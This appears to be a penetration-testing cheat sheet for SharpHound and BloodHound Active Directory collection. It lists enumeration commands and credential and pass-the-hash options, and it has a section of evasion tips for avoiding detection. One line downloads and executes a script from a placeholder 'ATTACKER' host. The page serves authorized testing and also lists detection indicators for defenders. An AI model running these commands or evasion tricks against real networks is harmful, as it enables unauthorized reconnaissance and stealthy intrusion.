← All cheat sheets

SHARPHOUND

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

SharpHound is the official data collector (ingestor) for BloodHound.
Enumerates Active Directory relationships for attack path discovery.

OVERVIEW#

SharpHound collects AD data (users, groups, sessions, ACLs, trusts)
and outputs JSON/ZIP files for import into BloodHound GUI.

Versions:
  - SharpHound.exe: C# standalone binary
  - SharpHound.ps1: PowerShell version (imports SharpHound module)
  - BloodHound.py:  Python remote collector (Linux/Kali)

BASIC COLLECTION#

# SharpHound.exe - Collect everything
SharpHound.exe -c All

# SharpHound.exe - Specific collection methods
SharpHound.exe -c DCOnly                # Domain controller data only
SharpHound.exe -c Default               # Group, Session, Trusts, ACL, ObjectProps
SharpHound.exe -c Session               # Session data only
SharpHound.exe -c Group                 # Group memberships only
SharpHound.exe -c ACL                   # ACL data only
SharpHound.exe -c Trusts                # Domain trusts
SharpHound.exe -c ObjectProps           # Object properties
SharpHound.exe -c LocalAdmin            # Local admin access
SharpHound.exe -c LocalGroup            # All local groups
SharpHound.exe -c RDP                   # RDP access
SharpHound.exe -c DCOM                  # DCOM access
SharpHound.exe -c PSRemote              # PS remoting access
SharpHound.exe -c Container             # Container (OU/GPO) data
SharpHound.exe -c GPOLocalGroup         # GPO-assigned local groups
SharpHound.exe -c CertServices          # AD CS (certificate services)

# Combine collection methods
SharpHound.exe -c Group,Session,ACL,Trusts
SharpHound.exe -c Default,CertServices

POWERSHELL VERSION#

# Import module
Import-Module .\SharpHound.ps1

# Or reflective load
IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER/SharpHound.ps1')

# Run collection
Invoke-BloodHound -CollectionMethods All
Invoke-BloodHound -CollectionMethods DCOnly
Invoke-BloodHound -CollectionMethods Session -Loop -LoopDuration 02:00:00

BLOODHOUND.PY (REMOTE COLLECTION)#

# Install
pip install bloodhound

# Basic collection
bloodhound-python -u 'user' -p 'password' -d domain.local -ns DC_IP -c All
bloodhound-python -u 'user' -p 'password' -d domain.local -c DCOnly

# With NTLM hash
bloodhound-python -u 'user' --hashes :NTLM_HASH -d domain.local -c All

# Kerberos auth
bloodhound-python -u 'user' -p 'password' -d domain.local -c All -k --auth-method kerberos

# Specify DNS
bloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.1 -c All

# Output directory
bloodhound-python -u 'user' -p 'password' -d domain.local -c All --zip -o ./output/

DOMAIN & TARGET OPTIONS#

# Target specific domain
SharpHound.exe -c All -d child.domain.local

# Target specific domain controller
SharpHound.exe -c All --domaincontroller DC01.domain.local

# Specify LDAP port
SharpHound.exe -c All --ldapport 636       # LDAPS
SharpHound.exe -c All --ldapport 3268      # Global Catalog

# Alternate credentials
SharpHound.exe -c All --ldapusername user --ldappassword pass

# Search base (OU targeting)
SharpHound.exe -c All --searchbase "OU=Servers,DC=domain,DC=local"

# Computer file (target specific hosts)
SharpHound.exe -c Session --computerfile targets.txt

OUTPUT OPTIONS#

# Output directory
SharpHound.exe -c All --outputdirectory C:\Temp

# Output prefix
SharpHound.exe -c All --outputprefix engagement_name

# ZIP output (default behavior)
SharpHound.exe -c All --zipfilename bloodhound_data.zip

# No ZIP (raw JSON files)
SharpHound.exe -c All --nojson false --nozip

# Encrypt ZIP
SharpHound.exe -c All --encryptzip --zippassword P@ssw0rd

# Pretty-print JSON
SharpHound.exe -c All --prettyjson

SESSION LOOP COLLECTION#

# Continuous session collection (catches logged-in users over time)
SharpHound.exe -c Session --loop --loopduration 02:00:00
SharpHound.exe -c Session --loop --loopduration 08:00:00 --loopinterval 00:05:00

# Session loop with other collection (first run All, then loop Sessions)
SharpHound.exe -c All --loop --loopduration 04:00:00

STEALTH & OPSEC#

# Stealth mode (single-threaded, avoids noisy queries)
SharpHound.exe -c All --stealth

# Throttle requests (milliseconds between LDAP queries)
SharpHound.exe -c All --throttle 1000
SharpHound.exe -c All --jitter 20          # Add jitter percentage

# Limit concurrent threads
SharpHound.exe -c All --threads 5          # Default is 50

# Skip ping check (useful when ICMP is blocked)
SharpHound.exe -c All --skippincheck

# Use LDAPS (encrypted LDAP)
SharpHound.exe -c All --secureldap

# Exclude domain controllers from session enum
SharpHound.exe -c All --excludedcs

# Randomize collection order
SharpHound.exe -c All --randomfilenames

# Cache file (resume interrupted collection)
SharpHound.exe -c All --cachename mycache.bin
SharpHound.exe -c All --invalidatecache    # Force fresh collection

NETEXEC BLOODHOUND INTEGRATION#

# Collect BloodHound data via NetExec
nxc ldap DC_IP -u user -p password --bloodhound --ns DC_IP -c All
nxc ldap DC_IP -u user -H NTLM_HASH --bloodhound --ns DC_IP

COLLECTION METHOD REFERENCE#

Method        What it Collects                       Noise Level
------        -------------------                    -----------
All           Everything below                       HIGH
Default       Group, Session, Trusts, ACL, ObjProps  MEDIUM
DCOnly        Users, Groups, Trusts, ACLs (LDAP)     LOW
Session       Active sessions (NetSessionEnum)       MEDIUM
LocalGroup    Local group members (SAM-R/registry)   HIGH
Group         AD group memberships                   LOW
ACL           DACLs/SACLs on AD objects              LOW
Trusts        Domain and forest trusts               LOW
ObjectProps   User/computer properties               LOW
Container     OU and GPO links                       LOW
CertServices  Certificate templates, CAs, ESC paths  LOW
GPOLocalGroup GPO-defined local groups               LOW
RDP           RDP access rights                      MEDIUM
DCOM          DCOM access rights                     MEDIUM
PSRemote      PS Remoting access rights              MEDIUM
LocalAdmin    Local admin enumeration                HIGH

DETECTION & INDICATORS#

  - LDAP queries from non-DC sources (Event 1644 if enabled)
  - NetSessionEnum/NetLocalGroupEnum API calls
  - SAM-R queries for local group enumeration
  - High volume of LDAP queries in short timeframe
  - SharpHound binary on disk or in memory
  - Named pipes and RPC calls to multiple hosts
  - Process creation with SharpHound arguments

EVASION TIPS#

  - Use DCOnly to minimize network noise (LDAP only, no SMB)
  - Run during business hours to blend with normal traffic
  - Use --stealth flag for single-threaded collection
  - Use bloodhound-python from Linux to avoid on-host detection
  - Use --throttle and --jitter to slow down queries
  - Reflectively load SharpHound.ps1 to avoid disk writes
  - Use Cobalt Strike execute-assembly for fileless execution
  - Rename SharpHound binary and randomize output filenames
  - Use LDAPS (port 636) to encrypt collection traffic
  - Collect in stages: DCOnly first, then targeted Session loops

IMPORTING DATA INTO BLOODHOUND#

  1. Start Neo4j database
  2. Launch BloodHound GUI
  3. Click "Upload Data" (or drag-and-drop ZIP)
  4. Wait for ingestion to complete
  5. Run pre-built queries or custom Cypher